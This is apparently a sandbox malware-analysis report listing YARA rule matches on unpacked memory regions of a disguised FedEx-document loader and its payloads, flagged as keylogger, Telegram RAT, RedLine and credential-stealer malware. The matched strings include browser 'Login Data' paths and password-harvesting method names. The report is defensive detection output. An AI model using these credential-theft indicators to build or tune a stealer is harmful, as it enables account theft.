7.2.hzwdvhxM.pif.2c440000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.2c440000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.2c440000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.228b218.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.25c20000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
12.2.hzwdvhxM.pif.259d1216.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.259d1216.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.259d1216.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
11.2.Mxhvdwzh.PIF.215fa548.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.2bdf0f20.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
14.3.hzwdvhxM.pif.28abccf0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
14.3.hzwdvhxM.pif.28abccf0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
14.3.hzwdvhxM.pif.28abccf0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.287d0000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.2a601216.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2a601216.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2a601216.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2a601216.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
12.2.hzwdvhxM.pif.259d1216.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
14.2.hzwdvhxM.pif.2a6002f6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
12.2.hzwdvhxM.pif.25c20f20.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.hzwdvhxM.pif.25c20f20.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
12.2.hzwdvhxM.pif.25c20f20.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
12.2.hzwdvhxM.pif.25c20f20.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
14.2.hzwdvhxM.pif.4da6c8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
7.3.hzwdvhxM.pif.2792f7f8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.21686db8.8.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.1.hzwdvhxM.pif.438038.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.Mxhvdwzh.PIF.2169cbd8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.29421216.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.hzwdvhxM.pif.29421216.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.hzwdvhxM.pif.29421216.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.hzwdvhxM.pif.29421216.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
7.2.hzwdvhxM.pif.29421216.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
7.2.hzwdvhxM.pif.29421216.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
12.1.hzwdvhxM.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
